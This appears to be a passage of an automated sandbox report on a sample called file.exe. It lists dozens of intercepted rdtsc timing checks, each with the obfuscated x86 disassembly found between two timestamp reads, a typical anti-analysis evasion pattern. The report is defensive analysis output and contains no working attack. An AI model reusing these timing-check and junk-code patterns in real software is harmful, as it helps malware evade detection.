                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDCA6 second address: CBDCD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F6074F51217h 0x0000000f pushad 0x00000010 jmp 00007F6074F51209h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA54 second address: CBEAC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e xor dword ptr [ebp+122D233Bh], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F6074D9F9E8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push eax 0x00000031 mov di, F403h 0x00000035 pop edi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F6074D9F9E8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov dword ptr [ebp+12454F23h], edx 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEAC4 second address: CBEAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDD81 second address: CBDD8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEAC9 second address: CBEADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F6074F511F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEADD second address: CBEAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6074D9F9E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0A24 second address: CC0A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0A33 second address: CC0A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074D9F9F1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6074D9F9F5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0A60 second address: CC0ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D1F1Ah] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6074F511F8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a jmp 00007F6074F51201h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F6074F511F8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b movzx edi, di 0x0000004e push eax 0x0000004f jbe 00007F6074F51200h 0x00000055 push eax 0x00000056 push edx 0x00000057 push esi 0x00000058 pop esi 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC19AF second address: CC1A0B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 754A12E0h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F6074D9F9E8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 add edi, dword ptr [ebp+122D2C10h] 0x0000002f push 00000000h 0x00000031 jl 00007F6074D9FA01h 0x00000037 js 00007F6074D9F9FBh 0x0000003d jmp 00007F6074D9F9F5h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1A0B second address: CC1A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC39F2 second address: CC39F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC39F7 second address: CC3A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F6074F511F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3FED second address: CC3FF7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3FF7 second address: CC4002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6074F511F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4FCA second address: CC4FEE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F6074D9F9ECh 0x00000010 jnc 00007F6074D9F9E6h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 jnp 00007F6074D9F9E8h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7F3F second address: CC7FAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F6074F511F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6074F51204h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F6074F511F8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d add dword ptr [ebp+122D1A48h], edx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F6074F511F8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push 00000000h 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jc 00007F6074F511FCh 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7FAF second address: CC7FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCB5FB second address: CCB601 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0962 second address: CD0966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0386 second address: CD039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6074F511FFh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD039C second address: CD03D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6074D9F9F2h 0x0000000e jmp 00007F6074D9F9ECh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7E81 second address: CD7E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7E85 second address: CD7E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7E95 second address: CD7E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8038 second address: CD807D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F6074D9F9EBh 0x00000011 ja 00007F6074D9F9E8h 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F6074D9F9F9h 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD807D second address: CD8081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8081 second address: CD8087 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8087 second address: CD809F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6074F51203h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCBD6 second address: CDCC16 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F6074D9FA04h 0x0000000f jmp 00007F6074D9F9F3h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC16 second address: CDCC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6074F51201h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB9AB second address: CDB9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB9B1 second address: CDB9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC33F second address: CDC345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC62B second address: CDC639 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC639 second address: CDC63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC63F second address: CDC655 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6074F511F6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC655 second address: CDC659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0F6F second address: CE0F8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F6074F511F6h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F6074F511FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0F8A second address: CE0F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10B6 second address: CE10D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6074F511F6h 0x00000008 jnl 00007F6074F511F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F6074F511FAh 0x00000016 push eax 0x00000017 pop eax 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10D6 second address: CE10DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10DC second address: CE10E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10E0 second address: CE10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6074D9F9EAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1251 second address: CE1257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1257 second address: CE1265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6074D9F9EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1265 second address: CE126B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13AD second address: CE13B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13B1 second address: CE13BB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6074F511F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13BB second address: CE13CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jp 00007F6074D9F9EEh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93D7C second address: C93D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93D80 second address: C93DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6074D9F9F3h 0x00000010 ja 00007F6074D9F9E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93DA4 second address: C93DB2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93DB2 second address: C93DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93DB8 second address: C93DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B815 second address: C6B831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074D9F9F8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B831 second address: C6B835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B835 second address: C6B864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6074D9F9E8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jnp 00007F6074D9F9E6h 0x00000015 jnp 00007F6074D9F9E6h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F6074D9F9ECh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6222 second address: CE6226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6226 second address: CE622C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE622C second address: CE6233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB45B8 second address: CB4642 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor cx, 7366h 0x0000000f lea eax, dword ptr [ebp+1248A336h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F6074D9F9E8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dh, 62h 0x00000031 add edi, dword ptr [ebp+122D1C66h] 0x00000037 nop 0x00000038 jmp 00007F6074D9F9F3h 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F6074D9F9F7h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F6074D9F9F9h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4642 second address: C93211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dx, di 0x0000000b call dword ptr [ebp+122D1E0Fh] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47F5 second address: CB47FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4C24 second address: CB4C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4DC6 second address: CB4DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F6074D9F9E8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 or dword ptr [ebp+1247D658h], esi 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jnc 00007F6074D9F9E8h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4DFF second address: CB4E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F6074F511F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6074F51208h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4E29 second address: CB4E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4F2B second address: CB4F30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB501C second address: CB5022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5022 second address: CB5039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F511FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5039 second address: CB503D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB503D second address: CB5047 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB517C second address: CB5182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5182 second address: CB5187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB56C8 second address: CB56CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB56CD second address: CB56E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6074F511F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB56E1 second address: CB56EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB58F5 second address: CB5962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F6074F511FEh 0x00000011 jc 00007F6074F511F8h 0x00000017 push esi 0x00000018 pop esi 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F6074F511F8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 cmc 0x00000035 lea eax, dword ptr [ebp+1248A37Ah] 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F6074F511F8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F6074F511FAh 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5962 second address: CB599F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F6074D9F9F8h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 movsx edx, di 0x00000014 lea eax, dword ptr [ebp+1248A336h] 0x0000001a or edx, dword ptr [ebp+122D2194h] 0x00000020 nop 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jo 00007F6074D9F9E6h 0x0000002a rdtsc
